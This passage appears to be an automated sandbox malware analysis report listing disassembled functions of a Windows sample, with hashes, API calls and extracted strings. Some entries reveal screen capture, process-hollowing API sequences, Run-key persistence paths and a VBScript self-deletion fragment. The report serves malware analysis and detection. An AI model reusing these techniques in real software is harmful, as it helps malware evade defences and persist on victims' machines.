                                • Opcode ID: 2888965568e38a2ba7a5abe7093904758464576a93ba76aee1c710f175ee0f35
                                • Instruction ID: 54543d52817102a935349e0949155b160d3bd36039d058f0142c014f19b14c2e
                                • Opcode Fuzzy Hash: 2888965568e38a2ba7a5abe7093904758464576a93ba76aee1c710f175ee0f35
                                • Instruction Fuzzy Hash: D5D05B3074421C77D61096959D0AEAA779CD701B52F0001A6BB05D72C0D9E15E0087D1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00434B47 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                Download Yara Rule
                                APIs
                                • SetUnhandledExceptionFilter.KERNEL32(Function_00034B53,0043487A), ref: 00434B4C
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExceptionFilterUnhandled
                                • String ID:
                                • API String ID: 3192549508-0
                                • Opcode ID: 94f820becb3d11eb86a2e9fe35426058ee7de7bf36e1f11b305b7456ad7b3320
                                • Instruction ID: b2b6851a15331e9206a2225a79f218ff0d060d1473a4ca8ef9e7ab7021fb00da
                                • Opcode Fuzzy Hash: 94f820becb3d11eb86a2e9fe35426058ee7de7bf36e1f11b305b7456ad7b3320
                                • Instruction Fuzzy Hash:
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0043E0CC Relevance: 1.5, Strings: 1, Instructions: 214COMMONLIBRARYCODE
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: 0
                                • API String ID: 0-4108050209
                                • Opcode ID: 0cdc0b4430c882dd513f9aba2f942575131dd1f5e6007437ccc46010af73f7df
                                • Instruction ID: cdd912994a32e16cda9accbda93f1ea0618352901e275441ec4d65c4c105c2b3
                                • Opcode Fuzzy Hash: 0cdc0b4430c882dd513f9aba2f942575131dd1f5e6007437ccc46010af73f7df
                                • Instruction Fuzzy Hash: 9C514771603648A7DF3489AB88567BF63899B0E344F18394BD882C73C3C62DED02975E
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00427A46 Relevance: 1.4, Strings: 1, Instructions: 109COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: @
                                • API String ID: 0-2766056989
                                • Opcode ID: d5e9d99cca5bd5e192b92381c11644beefd2514f072827777375d50a0dc20ebe
                                • Instruction ID: e4f6ca204f58efd2523fb0dbef6dba8f744ce0bfcff40a2940ff04dc0a880f4e
                                • Opcode Fuzzy Hash: d5e9d99cca5bd5e192b92381c11644beefd2514f072827777375d50a0dc20ebe
                                • Instruction Fuzzy Hash: A841FB75A187558BC340CF29C58061BFBE1FFD8318F655A1EF889A3350D375E9428B86
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0044D9C9 Relevance: .6, Instructions: 637COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 5da51411db3bde963f465f05a0d8b0dbce9b500299d5c90620e57fed4b77625f
                                • Instruction ID: ecf94096385373c2e9f2c5c276bef480e2dc0267d4a411ba40625ecd8b408152
                                • Opcode Fuzzy Hash: 5da51411db3bde963f465f05a0d8b0dbce9b500299d5c90620e57fed4b77625f
                                • Instruction Fuzzy Hash: 7F323831D69F014DE7239A35C862336A289BFB73C5F15D737F816B5AAAEB28C4834105
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0041F0FA Relevance: .6, Instructions: 598COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 80a43d6613d2cc44a87a2a7b42b24337b7313d3f5d9f36f695e048a997dbb0e1
                                • Instruction ID: 709358690f7fb2d2e3012b2358c769367bf3ff6314f01af24d3ecfcd65fe7181
                                • Opcode Fuzzy Hash: 80a43d6613d2cc44a87a2a7b42b24337b7313d3f5d9f36f695e048a997dbb0e1
                                • Instruction Fuzzy Hash: 443290716087459BD715DE28C4807AAB7E1BF84318F044A3EF89587392D778DD8BCB8A
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00437D33 Relevance: .3, Instructions: 345COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                • Instruction ID: b3ba5b81110409d95a5723b53b6c8744913893e641e186edab39e166e1bc966b
                                • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                • Instruction Fuzzy Hash: 7DC1B1723091930ADF2D4A3D853453FFBA15AA57B171A275FE8F2CB2C1EE18C524D524
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00438168 Relevance: .3, Instructions: 341COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                • Instruction ID: 7f684bb0481695d58232a2b0d47c85f4cbd32b92c5f53758fc2a28b9861b6fac
                                • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                • Instruction Fuzzy Hash: EAC1C5723092930ADF2D463D853453FFBA15AA57B171A275EE8F2CB2C5FE28C524C614
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 004378FE Relevance: .3, Instructions: 331COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                • Instruction ID: b4bbf9256ac03f5d23606f900b1ff113549fac5ad7a5b3908127750d008d8003
                                • Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                • Instruction Fuzzy Hash: FDC1B0B230D1930ADB3D4A3D953453FBBA15AA63B171A275ED8F2CB2C1FE18C524D624
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 004374E6 Relevance: .3, Instructions: 323COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                • Instruction ID: c0cc860fb011aaa8bec1e183ca1ba44e4399d72b3d9d4532b0ef978257cdf629
                                • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                • Instruction Fuzzy Hash: 08C1A0B230D1930ADB3D463D853853FBBA15AA67B171A276ED8F2CB2C1FE18C524D614
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0043E2FB Relevance: .2, Instructions: 237COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 912b91bcee59c5ac73c124bb0811566e2b40e5b970351445414cbd9e4b54fd2a
                                • Instruction ID: 9176630f27626b4b14444871c43cfb7a364794bde640040d1d9abeeee83df0d0
                                • Opcode Fuzzy Hash: 912b91bcee59c5ac73c124bb0811566e2b40e5b970351445414cbd9e4b54fd2a
                                • Instruction Fuzzy Hash: E1614531602709E6EF349A2B48917BF2395AB1D304F58341BED42DB3C1D55DED428A1E
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0043E558 Relevance: .2, Instructions: 237COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: c6b1042308d2b4dc2ea763a701fecb4f21cb89e1eeb5fcb47da04713de909616
                                • Instruction ID: c8a25274eb6ace22fd939f207aba0bb726f52b15d0dfb3f1b2e2615f3a586ecc
                                • Opcode Fuzzy Hash: c6b1042308d2b4dc2ea763a701fecb4f21cb89e1eeb5fcb47da04713de909616
                                • Instruction Fuzzy Hash: B2619C71602609A6DA34496B8893BBF6394EB6D308F94341BE443DB3C1E61DEC43875E
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00427BAF Relevance: .2, Instructions: 187COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 2ba1fc680d59fa3119c336882322ad8c37fd3cd0560676a8d3a4e4a4c2211dd3
                                • Instruction ID: 96b5c22f40dc969dc1399d427f9382315b517a9523814fa291cced01a0c32d8b
                                • Opcode Fuzzy Hash: 2ba1fc680d59fa3119c336882322ad8c37fd3cd0560676a8d3a4e4a4c2211dd3
                                • Instruction Fuzzy Hash: 5B617E72A083059FC304DF35D581A5FB7E5AFCC318F510E2EF499D6151EA35EA088B86
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00438770 Relevance: .1, Instructions: 76COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                • Instruction ID: 78f0f7b5b7642c22d8ee35c169576c4e0068381375f86828a5140fd971b96714
                                • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                • Instruction Fuzzy Hash: 9311E6BB24034143D6088A2DCCB85B7E797EADD321F7D626FF0424B758DB2AA9459608
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00418E76 Relevance: 51.1, APIs: 28, Strings: 1, Instructions: 328windowmemoryCOMMON
                                Download Yara Rule
                                APIs
                                • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00418E90
                                • CreateCompatibleDC.GDI32(00000000), ref: 00418E9D
                                  • Part of subcall function 00419325: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 00419355
                                • CreateCompatibleBitmap.GDI32(00000000,?), ref: 00418F13
                                • DeleteDC.GDI32(00000000), ref: 00418F2A
                                • DeleteDC.GDI32(00000000), ref: 00418F2D
                                • DeleteObject.GDI32(00000000), ref: 00418F30
                                • SelectObject.GDI32(00000000,00000000), ref: 00418F51
                                • DeleteDC.GDI32(00000000), ref: 00418F62
                                • DeleteDC.GDI32(00000000), ref: 00418F65
                                • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,?,?,00CC0020), ref: 00418F89
                                • GetCursorInfo.USER32(?), ref: 00418FA7
                                • GetIconInfo.USER32(?,?), ref: 00418FBD
                                • DeleteObject.GDI32(?), ref: 00418FEC
                                • DeleteObject.GDI32(?), ref: 00418FF9
                                • DrawIcon.USER32(00000000,?,?,?), ref: 00419006
                                • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00660046), ref: 0041903C
                                • GetObjectA.GDI32(00000000,00000018,?), ref: 00419068
                                • LocalAlloc.KERNEL32(00000040,00000001), ref: 004190D5
                                • GlobalAlloc.KERNEL32(00000000,?), ref: 00419144
                                • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00419168
                                • DeleteDC.GDI32(?), ref: 0041917C
                                • DeleteDC.GDI32(00000000), ref: 0041917F
                                • DeleteObject.GDI32(00000000), ref: 00419182
                                • GlobalFree.KERNEL32(?), ref: 0041918D
                                • DeleteObject.GDI32(00000000), ref: 00419241
                                • GlobalFree.KERNEL32(?), ref: 00419248
                                • DeleteDC.GDI32(?), ref: 00419258
                                • DeleteDC.GDI32(00000000), ref: 00419263
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: Delete$Object$CreateGlobal$AllocCompatibleFreeIconInfo$BitmapBitsCursorDisplayDrawEnumLocalSelectSettingsStretch
                                • String ID: DISPLAY
                                • API String ID: 4256916514-865373369
                                • Opcode ID: d098f0494e6cf70b6a27a8e3a9167c03c8027aa06e67c3efe5d1aa02d08667bb
                                • Instruction ID: c224b28d618b709f2792c20de920cdabb9de4a917dc726d0ffe82d87ba3e906a
                                • Opcode Fuzzy Hash: d098f0494e6cf70b6a27a8e3a9167c03c8027aa06e67c3efe5d1aa02d08667bb
                                • Instruction Fuzzy Hash: 75C14C71508301AFD720DF25DC44BABBBE9EB88715F00482EF98993291DB74ED45CB6A
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040D420 Relevance: 49.3, APIs: 6, Strings: 22, Instructions: 282registryCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00412850: TerminateProcess.KERNEL32(00000000,?,0040D80F), ref: 00412860
                                  • Part of subcall function 00412850: WaitForSingleObject.KERNEL32(000000FF,?,0040D80F), ref: 00412873
                                • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,00000000), ref: 0040D51D
                                • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D530
                                • SetFileAttributesW.KERNEL32(?,00000080,?,?,00000000), ref: 0040D549
                                • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,00000000), ref: 0040D579
                                  • Part of subcall function 0040B8AC: TerminateThread.KERNEL32(0040A27D,00000000,00000000,?,0040D442,?,00000000), ref: 0040B8BB
                                  • Part of subcall function 0040B8AC: UnhookWindowsHookEx.USER32(004750F0), ref: 0040B8C7
                                  • Part of subcall function 0040B8AC: TerminateThread.KERNEL32(0040A267,00000000,?,0040D442,?,00000000), ref: 0040B8D5
                                  • Part of subcall function 0041C3F1: CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,0041C510,00000000,00000000,00000000), ref: 0041C430
                                • ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000000), ref: 0040D7C4
                                • ExitProcess.KERNEL32 ref: 0040D7D0
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                • String ID: """, 0$")$0qF$0qF$8SG$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$hdF$hpF$open$wend$while fso.FileExists("
                                • API String ID: 1861856835-2780701618
                                • Opcode ID: b551f3b2373885e39556138e865b175cc3d4ae26f9f03a76750746f939b0c8d9
                                • Instruction ID: f0dedf37b1d13a6a68a2ae87fd6fc042f686ba0b246118386f774540a9e6bc24
                                • Opcode Fuzzy Hash: b551f3b2373885e39556138e865b175cc3d4ae26f9f03a76750746f939b0c8d9
                                • Instruction Fuzzy Hash: 2191A4716082005AC315FB62D8529AFB7A9AF91309F10443FB14AA71E3FF7C9D49C65E
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 004180EF Relevance: 47.5, APIs: 22, Strings: 5, Instructions: 289libraryloaderthreadCOMMON
                                Download Yara Rule
                                APIs
                                • GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 00418136
                                • GetProcAddress.KERNEL32(00000000), ref: 00418139
                                • GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 0041814A
                                • GetProcAddress.KERNEL32(00000000), ref: 0041814D
                                • GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 0041815E
                                • GetProcAddress.KERNEL32(00000000), ref: 00418161
                                • GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 00418172
                                • GetProcAddress.KERNEL32(00000000), ref: 00418175
                                • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00418217
                                • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 0041822F
                                • GetThreadContext.KERNEL32(?,00000000), ref: 00418245
                                • ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 0041826B
                                • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 004182ED
                                • TerminateProcess.KERNEL32(?,00000000), ref: 00418301
                                • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 00418341
                                • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 0041840B
                                • SetThreadContext.KERNEL32(?,00000000), ref: 00418428
                                • ResumeThread.KERNEL32(?), ref: 00418435
                                • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0041844C
                                • GetCurrentProcess.KERNEL32(?), ref: 00418457
                                • TerminateProcess.KERNEL32(?,00000000), ref: 00418472
                                • GetLastError.KERNEL32 ref: 0041847A
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process$AddressHandleModuleProc$ThreadVirtual$ContextCurrentFreeMemoryTerminate$AllocCreateErrorLastReadResumeWrite
                                • String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$ntdll
                                • API String ID: 4188446516-3035715614
                                • Opcode ID: b936ea2c1396c7360966393650c98f262233681cd2418a1eb1ae5de04f4b839e
                                • Instruction ID: 216cb1b436b1bb1c0a39989cd20dfb1fea14fcd849b5832ba41dfff5d3f22c39
